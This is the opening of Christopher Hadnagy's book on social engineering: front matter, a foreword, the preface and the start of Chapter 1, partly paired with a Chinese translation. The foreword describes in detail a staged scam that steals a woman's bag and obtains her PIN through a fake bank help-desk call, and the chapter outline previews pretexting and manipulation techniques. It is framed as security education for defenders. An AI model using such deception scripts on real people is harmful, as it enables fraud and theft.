Table of Contents

Cover

Title Page

Copyright

Dedication

About the Author

About the Technical Editor

Credits

Foreword

Preface and Acknowledgments

Chapter 1: A Look into the World of Social Engineering

Why This Book Is So Valuable

Overview of Social Engineering

Summary

Chapter 2: Information Gathering

Gathering Information

Sources for Information Gathering

Communication Modeling

The Power of Communication Models

Chapter 3: Elicitation

What Is Elicitation?

The Goals of Elicitation

Mastering Elicitation

Summary

Chapter 4: Pretexting: How to Become Anyone

What Is Pretexting?

The Principles and Planning Stages of Pretexting

Successful Pretexting

Summary

Chapter 5: Mind Tricks: Psychological Principles Used in Social Engineering

Modes of Thinking

Microexpressions

Neurolinguistic Programming (NLP)

Interview and Interrogation

Building Instant Rapport

The Human Buffer Overflow

Summary

Chapter 6: Influence: The Power of Persuasion

The Five Fundamentals of Influence and Persuasion

Influence Tactics

Altering Reality: Framing

Manipulation: Controlling Your Target

Manipulation in Social Engineering

Summary

Chapter 7: The Tools of the Social Engineer

Physical Tools

Online Information-Gathering Tools

Summary

Chapter 8: Case Studies: Dissecting the Social Engineer

Mitnick Case Study 1: Hacking the DMV

Mitnick Case Study 2: Hacking the Social Security Administration

Hadnagy Case Study 1: The Overconfident CEO

Hadnagy Case Study 2: The Theme Park Scandal

Top-Secret Case Study 1: Mission Not Impossible

Top-Secret Case Study 2: Social Engineering a Hacker

Why Case Studies Are Important

Summary

Chapter 9: Prevention and Mitigation

Learning to Identify Social Engineering Attacks

Creating a Personal Security Awareness Culture

Being Aware of the Value of the Information You Are Being Asked For

Keeping Software Updated

Developing Scripts

Learning from Social Engineering Audits

Concluding Remarks

Summary

Index

Social Engineering: The Art of Human Hacking

Published by

Wiley Publishing, Inc.

10475 Crosspoint Boulevard

Indianapolis, IN 46256

www.wiley.com

Copyright © 2011 by Christopher Hadnagy

Published by Wiley Publishing, Inc., Indianapolis, Indiana

Published simultaneously in Canada

ISBN: 978-0-470-63953-5

ISBN: 978-1-118-02801-8 (ebk)

ISBN: 978-1-118-02971-8 (ebk)

ISBN: 978-1-118-02974-9 (ebk)

Manufactured in the United States of America

10 9 8 7 6 5 4 3 2 1

No part of this publication may be reproduced, stored in a retrieval system or transmitted in any form or by any means, electronic, mechanical, photocopying, recording, scanning or otherwise, except as permitted under Sections 107 or 108 of the 1976 United States Copyright Act, without either the prior written permission of the Publisher, or authorization through payment of the appropriate per-copy fee to the Copyright Clearance Center, 222 Rosewood Drive, Danvers, MA 01923, (978) 750-8400, fax (978) 646-8600. Requests to the Publisher for permission should be addressed to the Permissions Department, John Wiley & Sons, Inc., 111 River Street, Hoboken, NJ 07030, (201) 748-6011, fax (201) 748-6008, or online at http://www.wiley.com/go/permissions.

Limit of Liability/Disclaimer of Warranty: The publisher and the author make no representations or warranties with respect to the accuracy or completeness of the contents of this work and specifically disclaim all warranties, including without limitation warranties of fitness for a particular purpose. No warranty may be created or extended by sales or promotional materials. The advice and strategies contained herein may not be suitable for every situation. This work is sold with the understanding that the publisher is not engaged in rendering legal, accounting, or other professional services. If professional assistance is required, the services of a competent professional person should be sought. Neither the publisher nor the author shall be liable for damages arising herefrom. The fact that an organization or Web site is referred to in this work as a citation and/or a potential source of further information does not mean that the author or the publisher endorses the information the organization or website may provide or recommendations it may make. Further, readers should be aware that Internet websites listed in this work may have changed or disappeared between when this work was written and when it is read.

For general information on our other products and services please contact our Customer Care Department within the United States at (877) 762-2974, outside the United States at (317) 572-3993 or fax (317) 572-4002.

Wiley also publishes its books in a variety of electronic formats. Some content that appears in print may not be available in electronic books.

Library of Congress Control Number: 2010937817

Trademarks: Wiley and the Wiley logo are trademarks or registered trademarks of John Wiley & Sons, Inc. and/or its affiliates, in the United States and other countries, and may not be used without written permission. All other trademarks are the property of their respective owners. Wiley Publishing, Inc. is not associated with any product or vendor mentioned in this book.

To my beautiful wife and my wonderful family; without you this would not have been possible. Mati, there are no words to describe the gratitude I feel for what you have done.

About the Author

Christopher Hadnagy is the lead developer of www.social-engineer.org, the world’s first social engineering framework. In more than 14 years of security and IT activity, he has partnered with the team at www.backtrack-linux.org and worked on a wide variety of security projects. He also serves as trainer and lead social engineer for Offensive Security’s penetration testing team.

About the Technical Editor

Jim O’Gorman is a professional penetration tester and social engineering auditor with more than 14 years of experience working for companies ranging from small ISPs to Fortune 100 corporations. Jim is co-trainer of the Offensive Security Advanced Windows Exploitation class, one of the most difficult exploit development classes available. A founding member of www.social-engineer.org, Jim is an authority on educating the public about social engineering threats.

Credits

Executive Editor
Carol Long

Project Editor
Brian Herrmann

Technical Editor
Jim O’Gorman

Production Editor
Kathleen Wisor

Copy Editor
Paula Lowell

Editorial Director
Robyn B. Siesky

Editorial Manager
Mary Beth Wakefield

Freelancer Editorial Manager
Rosemarie Graham

Marketing Manager
Ashley Zurcher

Production Manager
Tim Tate

Vice President and Executive Group Publisher
Richard Swadley

Vice President and Executive Publisher
Barry Pruett

Associate Publisher
Jim Minatel

Project Coordinator, Cover
Lynsey Stanford

Compositor
Maureen Forys, Happenstance Type-O-Rama

Proofreader
Jen Larsen, Word One New York

Indexer
Johnna VanHoose Dinse

Cover Image
© Digital Vision/Getty Images

Cover Designer
Ryan Sneed

Foreword

Security is a puzzle with two sides. From the inside, we look for a sense of comfort and assurance. From the outside, thieves, hackers, and vandals are looking for gaps. Most of us believe our homes are safe until one day, we find ourselves locked out. Suddenly, our perspective shifts and weaknesses are easily found.

To completely understand any kind of security, it is essential to step outside of the fence, in essence locking ourselves out, and start looking for other ways in. The problem is that most of us are blinded to potential problems by our own confidence or our belief that strong locks, thick doors, a high-end security system, and a guard dog are more than enough to keep most people at bay.

I’m not most people. In the last ten years I have pulled more cons and scams than anyone in history. I’ve beaten casinos, faked sports events, fixed auctions, talked people out of their dearest possessions, and walked right past seemingly unbeatable levels of security.

I have made a living exposing the methods of thieves, liars, crooks, and con men on a hit TV show called The Real Hustle. If I’d been a real criminal I would probably be rich, famous, or dead—probably all three. I have used a lifetime of research into all forms of deception to teach the public just how vulnerable they really are.

Each week, along with Alexis Conran, I pull real scams on real people who have no idea they are being ripped off. Using hidden cameras, we show the audience at home what is possible so they can recognize the same scam.

This unusual career has resulted in a unique understanding of how criminals think. I’ve become a sheep in wolves’ clothing. I’ve learned that, no matter how impossible something might seem, there’s almost always a clever, unexpected way to solve the problem.

An example of this is when I offered to show how easy it would be to not only steal a woman’s purse, but also to get her to tell me the PIN to her ATM or credit cards. The BBC didn’t think it was possible to accomplish this. When we presented this as an item for The Real Hustle, the BBC commissioner wrote “will never happen” beside it and sent it back. We knew it was entirely possible because different versions of the same scam had been reported, where victims of theft were talked into revealing their PINs in several clever scams around the UK. We took elements from different scams to illustrate exactly how someone might be duped into giving someone else complete access to their bank account.

To prove our point we set up the scam at a local cafe. The cafe was on the top floor of a mall on Oxford Street in London. It was relatively quiet as I sat at an empty table wearing a business suit. I placed my briefcase on the table and waited for a suitable victim. In a few moments, just such a victim arrived with a friend and sat at the table next to mine, placing her bag on the seat beside her. As was probably her habit, she pulled the seat close and kept her hand on the bag at all times.

I needed to steal the entire bag, but, with her hand resting on it and her friend sitting opposite, she was beginning to look like bad news. But, after a few minutes, her friend left to find a restroom. The mark was alone so I gave Alex and Jess the signal.

Playing the part of a couple, Alex and Jess asked the mark if she would take a picture of them both. She was happy to do so. She removed her hand from her bag to take the camera and snap a picture of the “happy couple” and, while distracted, I casually reached over, took her bag, and calmly locked it inside my briefcase. My victim was yet to notice the empty chair as Alex and Jess left the cafe. Once out of sight, Alex headed quickly for the parking garage.

It didn’t take long for her to realize her bag was gone. Instantly, she began to panic. She stood up and looked around, frantically. This was exactly what we were hoping for, so I asked her if she needed help.

She started to ask me if I had seen anything. I told her I hadn’t but convinced her to sit down and think about what was in the bag. A phone. Make-up. A little cash. And her credit cards. Bingo!

I asked who she banked with and then told her that I worked for that bank. What a stroke of luck! I reassured her that everything would be fine but she would need to cancel her credit card right away. I called the “help-desk” number, which was actually Alex, and handed my phone to her. She was hooked and it was now up to Alex to reel her in.

Alex was downstairs in the van. On the dashboard, a CD player was playing office noises we had downloaded from the Internet. He kept the mark calm, strung her along, and then assured her that her card could easily be canceled but, to verify her identity, she needed to enter her PIN on the keypad of the phone she was using.

My phone and my keypad.

You can guess the rest. Once we had her PIN, I left her with her friend and headed for the door. If we were real thieves, we would have had access to her account via ATM withdrawals and chip and PIN purchases. Fortunately for her, it was just a TV show and she was so happy when I came back to return her bag and tell her it was all a fake scam. She even thanked me for giving her bag back, to which I replied, “Don’t thank me. I’m the one who stole it.”

No matter how secure a system is, there’s always a way to break through. Often, the human elements of the system are the easiest to manipulate and deceive. Creating a state of panic, using influence, manipulation tactics, or causing feelings of trust are all methods used to put a victim at ease.

The scenario outlined here is an extreme example, but it shows that, with a little creativity, seemingly impossible scams can be pulled off.

The first step in becoming more secure is simply conceding that a system is vulnerable and can be compromised. On the contrary, by believing a breach is impossible, a blindfold is placed over your eyes as you run full speed ahead. Social Engineering is designed to provide you with invaluable insight into the methods used to break seemingly secure systems and expose the threats that exist in the largest vulnerability, the people. This book is not a guide for hackers—they already know how to break in and are finding new ways every day. Instead, Chris Hadnagy offers those inside the fence an opportunity to take a look from the other side, the dark side, as he exposes the thinking and methods of the world’s most malicious hackers, con men, and social engineers.

Remember: those who build walls think differently than those who seek to go over, under, around, or through them. As I often tell my audiences, if you think you can’t be conned, you’re just the person I’d like to meet.

Paul Wilson

October 2010

Preface and Acknowledgments

It was just a few years ago that I was sitting with my friend and mentor, Mati Aharoni, deciding to launch www.social-engineer.org. The idea grew and grew until it became an amazing website supported by some truly brilliant people. It didn’t take long to come up with the idea to put those years of research and experience down into the pages of a book. When I had the idea, I was met with overwhelming support. That said, some specific acknowledgements are very important to how this book became what it is today.

From a very young age I was always interested in manipulating people. Not in a bad way, but I found it interesting how many times I was able to obtain things or be in situations that would be unreal. One time I was with a good friend and business associate at a tech conference at the Javits Center in New York City. A large corporation had rented FAO Schwarz for a private party. Of course, the party was by invitation only, and my friend and I were two small fish in a large pond: the party was for the CEOs and upper management of companies like HP, Microsoft, and the like. My friend said to me, “It would be really cool to get into that party.”

I simply responded, “Why can’t we?” At that point I thought to myself, “I know we can get in there if we just ask the right way.” So I approached the women in charge of the ticket booth and the guest list and I spoke to them for a few minutes. As I was speaking to them, Linus Torvalds, the creator of the Linux kernel, walked by. I had picked up a Microsoft plush toy at one of the booths and as a joke I turned to Linus and said, “Hey, you want to autograph my Microsoft toy?”

He got a good laugh out of it and as he grabbed his tickets he said, “Nice job, young man. I will see you at the party.”

I turned back to the women in charge of the ticket booth and was handed two tickets to an exclusive party inside FAO Schwarz.

It wasn’t until later in life that I began to analyze stories like this, after some started calling it “the Hadnagy Effect.” As funny as that sounds, I began to see that much of what occurred to me wasn’t luck or fate, but rather knowing how to be where I needed to be at the right time.

That doesn’t mean it didn’t take hard work and a lot of help along the way. My muse in life is my wonderful wife. For almost two decades you have supported me in all my ideas and efforts and you are my best friend, my confidant, and my support pillar. Without you I would not be where I am today. In addition, you have produced two of the most beautiful children on this planet. My son and my daughter are the motivation to keep doing all of this. If anything I do can make this place just a little more secure for them, or teach them how to keep themselves safe, it is all worthwhile.

To my son and daughter, I cannot express enough gratitude for your support, love, and motivation. My hope is that my son and my little princess will not have to deal with the malicious, bad people out in this world, but I know just how unlikely that is. May this information keep you both just a little more secure.

Paul, aka rAWjAW, thanks for all your support on the website. The thousands of hours you spent as the “wiki-master” paid off and now we have a beautiful resource for the world to use. I know I don’t say it enough, but “you’re fired!” Combined with the beautiful creation of Tom, aka DigIp, the website is a work of art.

Carol, my editor at Wiley, worked her butt off to get this organized and following some semblance of a timeline. She did an amazing job putting together a great team of people and making this idea a reality. Thank you.

Brian, I meant what I said. I am going to miss you when this is over. As I worked with you over the last few months I began to look forward to my editing sessions and the knowledge you would lay on me. Your honest and frank counsel and advice made this book better than it was.

My gratitude goes out to Jim, aka Elwood, as well. Without you a lot of what has happened on social-engineer.org as well as inside this book, heck in my life in the last couple years, would not be a reality. Thank you for keeping me humble and in check. Your constant reality checks helped me stay focused and balance the many different roles I had to play. Thank you.

Liz, about twelve years ago you told me I should write a book. I am sure you had something different in mind, but here it is. You have helped me through some pretty dark times. Thank you and I love you.

Mati, my mentor, and my achoti, where would I be without you? Mati, you truly are my mentor and my brother. Thank you from the bottom of my heart for having the faith in me that I could write this book and launch www.social-engineer.org and that both would be good. More than that, your constant counsel and direction have been translated on the pages of this book to make me more than I thought I could be.

Your support with the BackTrack team, along with the support of the team at www.offensive-security.com, has transcended all I could have expected. Thank you for helping me balance and prioritize. My achoti, a special thanks to you for being the voice of reason and the light at the end of some frustrating days. With all my love I thank you.

Each person I mentioned here contributed to this book in some fashion. With their help, support, and love, this book has become a work that I am proud to have my name on. For the rest of you who have supported the site, the channel, and our research, thank you.

As you read this book, I hope it affects you the way writing it has affected me.

Albert Einstein once said, “Information is not knowledge.” That is a powerful thought. Just reading this book will not somehow implant this knowledge into your being. Apply the principles, practice what is taught in these pages, and make the information a part of your daily life. When you do, you will then see this knowledge take effect.

Christopher Hadnagy

October 2010

第1章

Chapter 1

 

深入了解社会工程学的世界

A Look into the World of Social Engineering

 

了解敌人,了解自己,就不必害怕百战百胜的结果。

If you know the enemy and know yourself you need not fear the results of a hundred battles.

 

—孙子

—Sun Tzu

 

社会工程学 (SE) 在很大程度上被误解了,导致人们对社会工程学是什么以及它是如何运作的有着许多不同的看法。这导致了一种情况,有些人可能认为 SE 只是骗取披萨或性满足等琐碎的免费物品的谎言;其他人认为 SE 只是指罪犯或骗子使用的工具,或者认为它是一门科学,其理论可以分解成部分或方程式并进行研究。或者也许它是一种失传已久的神秘艺术,使从业者能够像魔术师或幻术师一样使用强大的心理技巧。

Social engineering (SE) has been largely misunderstood, leading to many differing opinions on what social engineering is and how it works. This has led to a situation where some may view SE as simply lying to scam trivial free items such as pizza or obtaining sexual gratification; others think SE just refers to the tools used by criminals or con men, or perhaps that it is a science whose theories can be broken down into parts or equations and studied. Or perhaps it’s a long-lost mystical art giving practitioners the ability to use powerful mind tricks like a magician or illusionist.

 

不管你属于哪个阵营,这本书都适合你。社会工程学每天都在日常情况下被人们使用。一个试图在糖果区占便宜的孩子或一个寻求加薪的员工都在使用社会工程学。社会工程学在政府或小型企业营销中很常见。不幸的是,当罪犯、骗子等诱骗人们泄露使他们容易受到犯罪攻击的信息时,也会使用社会工程学。像任何工具一样,社会工程学没有好坏之分,只是一种用途各异的工具。

In whatever camp your flag flies, this book is for you. Social engineering is used every day by everyday people in everyday situations. A child trying to get her way in the candy aisle or an employee looking for a raise is using social engineering. Social engineering happens in government or small business marketing. Unfortunately, it is also present when criminals, con men, and the like trick people into giving away information that makes them vulnerable to crimes. Like any tool, social engineering is not good or evil, but simply a tool that has many different uses.

 

请考虑以下一些问题来加深这一观点:

Consider some of these questions to drive that point home:

 
 
     
  • 您是否被委托确保公司尽可能的安全?
  • Have you been tasked to make sure your company is as secure as possible?
  •  
     
  • 您是一位阅读所有最新信息的安全爱好者吗?
  • Are you a security enthusiast who reads every bit of the latest information out there?
  •  
     
  • 您是受雇来测试客户安全性的专业渗透测试人员吗?
  • Are you a professional penetration tester who is hired to test the security of your clients?
  •  
     
  • 您是一名以 IT 专业为专业的大学生吗?
  • Are you a college student taking some form of IT specialization as your major?
  •  
     
  • 您现在是一名社会工程师,正在寻找新的和改进的想法来应用于您的实践吗?
  • Are you presently a social engineer looking for new and improved ideas to utilize in your practice?
  •  
     
  • 您是担心欺诈和身份盗窃危险的消费者吗?
  • Are you a consumer who fears the dangers of fraud and identity theft?
  •  
 

无论您遇到哪种情况,本书中包含的信息都将让您大开眼界,了解如何使用社交工程技能。您还将窥视社交工程的黑暗世界,了解“坏人”如何利用这些技能占上风。从那里,您将学习如何降低受到社交工程攻击的几率。

Regardless of which one of those situations fits you, the information contained within this book will open your eyes to how you can use social engineering skills. You will also peer into the dark world of social engineering and learn how the “bad guys” use these skills to gain an upper hand. From there, you learn how to become less vulnerable to social engineering attacks.

 

首先要提醒大家:这本书不适合弱者阅读。它将带你走进社会黑暗的角落,那里住着“黑帽”和恶意黑客。它揭示并深入研究了间谍和骗子使用的社会工程学领域。它回顾了看似从詹姆斯邦德电影中偷来的策略和工具。此外,它还涵盖了常见的日常情况,然后展示了它们是如何成为复杂的社会工程学场景的。最后,这本书揭示了专业社会工程师,甚至是专业罪犯的“内部”技巧和窍门。

One warning up front: This book is not for the weak. It takes you into those dark corners of society where the “black hats,” the malicious hackers, live. It uncovers and delves into areas of social engineering that are employed by spies and con men. It reviews tactics and tools that seem like they are stolen from a James Bond movie. In addition, it covers common, everyday situations and then shows how they are complex social engineering scenarios. In the end, the book uncovers the “insider” tips and tricks of professional social engineers and yes, even professional criminals.

 

有人问我为什么愿意透露这些信息。答案很简单:“坏人”不会因为合同限制或自己的道德而停止攻击。他们不会在一次失败后就停止攻击。恶意黑客不会因为公司不希望他们的服务器被入侵而消失。相反,社会工程、员工欺骗和互联网欺诈每天都在被越来越多地使用。当软件公司正在学习如何加强他们的程序时,黑客和恶意的社会工程师正在转向基础设施中最薄弱的部分——人。他们的动机完全是为了投资回报 (ROI);没有一个有自尊心的黑客会花 100 个小时来从一次只需一小时或更短时间的简单攻击中获得相同的结果。

Some have asked why I would be willing to reveal this information. The answer is simple: The “bad guys” don’t stop because of a contractual limitation or their own morals. They don’t cease after one failed attempt. Malicious hackers don’t go away because companies don’t like their servers to be infiltrated. Instead, social engineering, employee deception, and Internet fraud are used more and more each day. While software companies are learning how to strengthen their programs, hackers and malicious social engineers are turning to the weakest part of the infrastructure—the people. Their motivation is all about return on investment (ROI); no self-respecting hacker is going to spend 100 hours to get the same results from a simple attack that takes one hour, or less.

The sad result in the end is that no way exists to be 100% secure—unless you unplug all electronic devices and move to the mountains. Because that isn’t too practical, nor is it a lot of fun, this book discusses ways to become more aware and educated about the attacks out there and then outlines methods that you can use to protect against them. My motto is “security through education.” Being educated is one of the only surefire ways to remain secure against the increasing threats of social engineering and identity theft. Kaspersky Labs, a leading provider of antivirus and protection software, estimated that more than 100,000 malware samples were spread through social networks in 2009. In a recent report, Kaspersky estimated that “attacks against social networks are 10 times more successful” than other types of attacks.

The old hacker adage “knowledge is power” applies here. The more knowledge and understanding consumers and businesses have of the dangers and threats of social engineering, and the more each attack scenario is dissected, the easier it is to protect against, mitigate, and stop these attacks. That is where the power of all this knowledge comes in.

Why This Book Is So Valuable

Many books are available on the market on security, hacking, penetration testing, and even social engineering. Many of these books have very valuable information and tips to help their readers. Even with all the information available, a book was needed that takes social engineering information to the next level and describes these attacks in detail, explaining them from the malicious side of the fence. This book is not merely a collection of cool stories, neat hacks, or wild ideas. This book covers the world’s first framework for social engineering. It analyzes and dissects the very foundation of what makes a good social engineer and gives practical advice on how to use these skills to enhance the readers’ abilities to test the biggest weakness—the human infrastructure.

The Layout

This book offers a unique approach to social engineering. It is structured closely to the in-depth social engineering framework found at www.social-engineer.org/framework. This framework outlines the skills and the tools (physical, mental, and personality) a person should strive to possess to be an excellent social engineer.

This book takes a “tell and show approach” by first presenting a principle behind a topic then defining, explaining, and dissecting, then showing its application using collections of real stories or case studies. This is not merely a book about stories or neat tricks, but a handbook, a guide through the dark world of social engineering.

Throughout the book you can find many Internet links to stories or accounts as well as links to tools and other aspects of the topics discussed. Practical exercises appear throughout the book that are designed to help you master not only the social engineering framework but also the skills to enhance your daily communications.

These statements are especially true if you are a security specialist. As you read this book, I hope to impress upon you that security is not a “part-time” job and is not something to take lightly. As criminals and malicious social engineers seem to go from bad to worse in this world, attacks on businesses and personal lives seem to get more intense. Naturally, everyone wants to be protected, as evidenced by the increase in sales for personal protection software and devices. Although these items are important, the best protection is knowledge: security through education. The only true way to reduce the effect of these attacks is to know that they exist, to know how they are done, and to understand the thinking process and mentality of the people who would do such things.

When you possess this knowledge and you understand how malicious hackers think, a light bulb goes off. That proverbial light will shine upon the once-darkened corners and enable you to clearly see the “bad guys” lurking there. When you can see the way these attacks are used ahead of time, you can prepare your company's and your personal affairs to ward them off.

Of course, I am not contradicting what I said earlier; I believe there is no way to truly be 100% secure. Even top-secret, highly guarded secrets can be and have been hacked in the simplest of manners.

Look at the archived story at www.social-engineer.org/resources/book/TopSecretStolen.htm, from a newspaper in Ottawa, Canada. This story is very interesting, because some documents ended up in the wrong hands. These weren’t just any documents, but top-secret defense documents that outlined things such as locations of security fences at the Canadian Forces Base (CFB) in Trenton, the floor plan of the Canadian Joint Incident Response Unit, and more. How did the breach occur? The plans were thrown away, in the trashcan, and someone found them in the dumpster. A simple dumpster dive could have led to one of that country’s largest security breaches.

Simple-yet-deadly attacks are launched every day and point to the fact that people need education; need to change the way they adhere to password policies and the way they handle remote access to servers; and need to change the way they handle interviews, deliveries, and employees who are hired or fired. Yet without education the motivation for change just isn’t there.

In 2003 the Computer Security Institute, together with the FBI, conducted a survey and found that 77% of the companies interviewed named a disgruntled employee as the source of a major security breach. Vontu, the data loss prevention section of Symantec (http://go.symantec.com/vontu/), says that 1 out of every 500 emails contains confidential data. Some of the highlights of that report, quoted from http://financialservices.house.gov/media/pdf/062403ja.pdf, are as follows:

  • 62% reported incidents at work that could put customer data at risk for identity theft.
  • 66% say their co-workers, not hackers, pose the greatest risk to consumer privacy. Only 10% said hackers were the greatest threat.
  • 46% say it would be “easy” to “extremely easy” for workers to remove sensitive data from the corporate database.
  • 32%, about one in three, are unaware of internal company policies to protect customer data.

These are staggering and stomach-wrenching statistics.

Later chapters discuss these numbers in more detail. The numbers show a serious flaw in the way security itself is handled. When there is education, hopefully before a breach, then people can make changes that can prevent unwanted loss, pain, and monetary damage.

Sun Tzu said, “If you know the enemy and know yourself you need not fear the results of a hundred battles.” How true those words are, but knowing is just half the battle. Action on knowledge is what defines wisdom, not just knowledge alone.

This book is most effective used as a handbook or guide through the world of social attacks, social manipulation, and social engineering.

What’s Coming Up

This book is designed to cover all aspects, tools, and skills used by professional and malicious social engineers. Each chapter delves deep into the science and art of a specific social engineering skill to show you how it can be used, enhanced, and perfected.

The next section of this chapter, “Overview of Social Engineering,” defines social engineering and what roles it plays in society today, as well as the different types of social engineering attacks, including other areas of life where social engineering is used in a non-malicious way. I will also discuss how a social engineer can use the social engineering framework in planning an audit or enhancing his own skills.

Chapter 2 is where the real meat of the lessons begins. Information gathering is the foundation of every social engineering audit. The social engineer’s mantra is, “I am only as good as the information I gather.” A social engineer can possess all the skills in the world, but if he or she doesn’t know the target, if every intimate detail hasn’t been outlined, failure becomes far more likely. Information gathering is the crux of every social engineering engagement, although people skills and the ability to think on your feet can help you get out of a sticky situation. More often than not, the more information you gather, the better your chances of success.

The questions that I will answer in that chapter include the following:

  • What sources can a social engineer use?
  • What information is useful?
  • How can a social engineer collect, gather, and organize this information?
  • How technical should a social engineer get?
  • How much information is enough?

After the analysis of information gathering, the next topic addressed in Chapter 2 is communication modeling. This topic ties in closely with information gathering. First I discuss what communication modeling is and how it began as a practice. Then the chapter walks through the steps needed to develop and then use a proper communication model. It outlines how a social engineer uses this model against a target and the benefits of outlining one for every engagement.

Chapter 3 covers elicitation, the next logical step in the framework. It offers a very in-depth look into how questions are used to gain information, passwords, in-depth knowledge of the target, and his or her company. You will learn what is good and proper elicitation and learn how important it is to have your elicitations planned out.

Chapter 3 also covers the important topic of preloading the target’s mind with information to make your questions more readily accepted. As you unravel this section you will clearly see how important it is to become an excellent elicitor. You will also clearly see how you can use that skill not just in your security practices but in daily life.

Chapter 4, which covers pretexting, is powerful. This heavy topic is one of the critical points for many social engineers. Pretexting involves developing the role the social engineer will play for the attack on the company. Will the social engineer be a customer, vendor, tech support, new hire, or something equally realistic and believable? Pretexting involves not just coming up with the storyline but also developing the way your persona would look, act, talk, walk; deciding what tools and knowledge they would have; and then mastering the entire package so when you approach the target, you are that person, and not simply playing a character. The questions covered include the following:

  • What is pretexting?
  • How do you develop a pretext?
  • What are the principles of a successful pretext?
  • How can a social engineer plan and then execute a perfect pretext?

The next step in the framework is one that could fill volumes. Yet it must be discussed from the viewpoint of a social engineer. Chapter 5 is a no-holds-barred discussion of some very contentious topics, including eye cues. For example, what are the varying opinions of some professionals about eye cues, and how can a social engineer use them? The chapter also delves into the fascinating science of microexpressions and its implications for social engineering.

Chapter 5 goes on analyzing the research, yielding answers to these questions:

  • Is it possible to use microexpressions in the field of security?
  • How would you do so?
  • What benefit are microexpressions?
  • Can people train themselves to learn how to pick up on microexpressions automatically?
  • After we do the training, what information is obtained through microexpressions?

Probably one of the most debated topics in Chapter 5 is neurolinguistic programming (NLP). The debate has left many people undecided on what it is and how it can be used. Chapter 5 presents a brief history of NLP as well as what makes it such a controversy. You can decide for yourself whether NLP is usable in social engineering.

Chapter 5 also discusses one of the most important aspects of social engineering in person or on the phone: knowing how to ask good questions, listen to responses, and then ask more questions. Interrogation and interviewing are two methods that law enforcement has used for years to manipulate criminals into confessing as well as to solve the hardest cases. This part of Chapter 5 puts to practical use the knowledge you gained in Chapter 3.

In addition, Chapter 5 discusses how to build instant rapport—a skill you can use in everyday life. The chapter ends by covering my own personal research into “the human buffer overflow”: the notion that the human mind is much like the software that hackers exploit every day. By applying certain principles, a skilled social engineer can overflow the human mind and inject any command they want.

Just like hackers write overflows to manipulate software to execute code, the human mind can be given certain instructions to, in essence, “overflow” the target and insert custom instructions. Chapter 5 is a mind-blowing lesson in how to use some simple techniques to master how people think.

Many people have spent their lives researching and proving what can and does influence people. Influence is a powerful tool with many facets to it. To this end, Chapter 6 discusses the fundamentals of persuasion. The principles engaged in Chapter 6 will start you on the road toward becoming a master of persuasion.

The chapter presents a brief discussion of the different types of persuasion that exist and provides examples to help solidify how you can use these facets in social engineering.

The discussion doesn’t stop there—framing is also a hot topic nowadays. Many different opinions exist on how one can use framing, and this book shows some real-life examples of it. Then dissecting each, I take you through the lessons learned and things you can do to practice reframing yourself as well as use framing in everyday life as a social engineer.

Another overwhelming theme in social engineering is manipulation:

  • What is its purpose?
  • What kinds of incentives drive manipulators?
  • How can a person use it in social engineering?

Chapter 6 presents all a social engineer needs to know on the topic of manipulation, and how to successfully apply such skills.

Chapter 7 covers the tools that can make a social engineering audit more successful. From physical tools such as hidden cameras to software-driven information gathering tools, each section covers tried-and-tested tools for social engineers.

Once you understand the social engineering framework, Chapter 8 discusses some real-life case studies. I have chosen two excellent accounts from world-renowned social engineer Kevin Mitnick. I analyze, dissect, and then propose what you can learn from these examples and identify the methods he used from the social engineering framework. Moreover, I discuss what can be learned from his attack vectors as well as how they can be used today. I discuss some personal accounts and dissect them, as well.

What social engineering guide would be complete without discussing some of the ways you can mitigate these attacks? The appendix provides this information. I answer some common questions on mitigation and give some excellent tips to help secure you and your organization against these malicious attacks.

The preceding overview is just a taste of what is to come. I truly hope you enjoy reading this book as much as I have enjoyed writing it. Social engineering is a passion for me. I do believe there are certain traits, whether learned or inherent, that can make someone a great social engineer. I also subscribe to the belief that with enough time and energy anyone can learn the different aspects of social engineering and then practice these skills to become a proficient social engineer.

The principles in this book are not new; there is no mind-blowing technology that you will see that will change the face of security forever. There are no magic pills. As a matter of fact, the principles have been around for as long as people have. What this book does do is combine all of these skills in one location. It does give you clear direction on how to practice these skills as well as examples of real-life situations where they are used. All of this information can help you gain a true sense of understanding the topics discussed.

The best place to start is with the basics, by answering one fundamental question: “What is social engineering?”

Overview of Social Engineering

What is social engineering?

I once asked this question to a group of security enthusiasts and I was shocked at the answers I received:

“Social engineering is lying to people to get information.”

“Social engineering is being a good actor.”

“Social engineering is knowing how to get stuff for free.”

Wikipedia defines it as “the act of manipulating people into performing actions or divulging confidential information. While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victim.”

Although it has been given a bad name by the plethora of “free pizza,” “free coffee,” and “how to pick up chicks” sites, aspects of social engineering actually touch many parts of daily life.

Webster’s Dictionary defines social as “of or pertaining to the life, welfare, and relations of human beings in a community.” It also defines engineering as “the art or science of making practical application of the knowledge of pure sciences, as physics or chemistry, as in the construction of engines, bridges, buildings, mines, ships, and chemical plants or skillful or artful contrivance; maneuvering.”

Combining those two definitions you can easily see that social engineering is the art or better yet, science, of skillfully maneuvering human beings to take action in some aspect of their lives.

This definition broadens the horizons of social engineers everywhere. Social engineering is used in everyday life in the way children get their parents to give in to their demands. It is used in the way teachers interact with their students, in the way doctors, lawyers, or psychologists obtain information from their patients or clients. It is definitely used in law enforcement, and in dating—it is truly used in every human interaction from babies to politicians and everyone in between.

I like to take that definition a step further and say that a true definition of social engineering is the act of manipulating a person to take an action that may or may not be in the “target’s” best interest. This may include obtaining information, gaining access, or getting the target to take certain action.

For example, doctors, psychologists, and therapists often use elements I consider social engineering to “manipulate” their patients to take actions that are good for them, whereas a con man uses elements of social engineering to convince his target to take actions that lead to loss for them. Even though the end game is much different, the approach may be very much the same. A psychologist may use a series of well-conceived questions to help a patient come to a conclusion that change is needed. Similarly, a con man will use well-crafted questions to move his target into a vulnerable position.

Both of these examples are social engineering at its truest form, but have very different goals and results. Social engineering is not just about deceiving people or lying or acting a part. In a conversation I had with Chris Nickerson, a well-known social engineer from the TV series Tiger Team, he said, “True social engineering is not just believing you are playing a part, but for that moment you are that person, you are that role, it is what your life is.”

Social engineering is not just any one action but a collection of the skills mentioned in the framework that when put together make up the action, the skill, and the science I call social engineering. In the same way, a wonderful meal is not just one ingredient, but is made up by the careful combining, mixing, and adding of many ingredients. This is how I imagine social engineering to be, and a good social engineer is like a master chef. Put in a little dab of elicitation, add a shake of manipulation, and a few heaping handfuls of pretexting, and bam!—out comes a great meal of the perfect social engineer.

